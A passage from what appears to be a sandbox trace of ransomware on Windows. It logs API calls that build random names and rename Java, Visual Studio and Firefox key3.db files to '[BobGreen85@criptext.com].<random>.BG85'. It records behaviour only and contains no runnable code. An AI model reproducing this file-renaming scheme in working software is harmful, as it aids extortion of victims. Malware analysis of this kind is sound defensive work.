lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0064.167] GetTickCount () returned 0x1149454 [0064.167] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450622539) returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0064.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.168] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\[BobGreen85@criptext.com].YCdSlMOr-gBhUkupx.BG85" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\[bobgreen85@criptext.com].ycdslmor-gbhukupx.bg85"), dwFlags=0x1) returned 1 [0064.169] GetTickCount () returned 0x1149454 [0064.169] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450750954) returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0064.169] GetTickCount () returned 0x1149454 [0064.169] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450787655) returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.169] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].PPfekQWT-TozV3ihj.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].ppfekqwt-tozv3ihj.bg85"), dwFlags=0x1) returned 1 [0064.170] GetTickCount () returned 0x1149454 [0064.170] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450890127) returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0064.170] GetTickCount () returned 0x1149454 [0064.170] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450926986) returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0064.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0064.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].8JXyUQks-2N17JwJG.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].8jxyuqks-2n17jwjg.bg85"), dwFlags=0x1) returned 1 [0064.171] GetTickCount () returned 0x1149454 [0064.171] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18451027979) returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0064.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0064.172] GetTickCount () returned 0x1149454 [0064.172] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18451063538) returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0064.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0064.172] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\[BobGreen85@criptext.com].V6w2VF9Y-k5gklhbc.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\[bobgreen85@criptext.com].v6w2vf9y-k5gklhbc.bg85"), dwFlags=0x1) returned 1 [0064.173] GetTickCount () returned 0x1149454 [0064.173] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18451172049) returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0064.173] GetTickCount () returned 0x1149454 [0064.173] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18451210005) returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0064.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].l6GxCuY6-LWB54kh8.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].l6gxcuy6-lwb54kh8.bg85"), dwFlags=0x1) returned 1 [0064.473] GetTickCount () returned 0x114958c [0064.473] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18481232961) returned 1 [0064.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0064.474] GetTickCount () returned 0x114958c [0064.474] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18481269129) returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0064.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0064.474] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].jU4lRFpa-9BzxeXzZ.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].ju4lrfpa-9bzxexzz.bg85"), dwFlags=0x1) returned 1 [0064.475] GetTickCount () returned 0x114958c [0064.475] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18481384443) returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0064.475] GetTickCount () returned 0x114958c [0064.475] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18481426169) returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 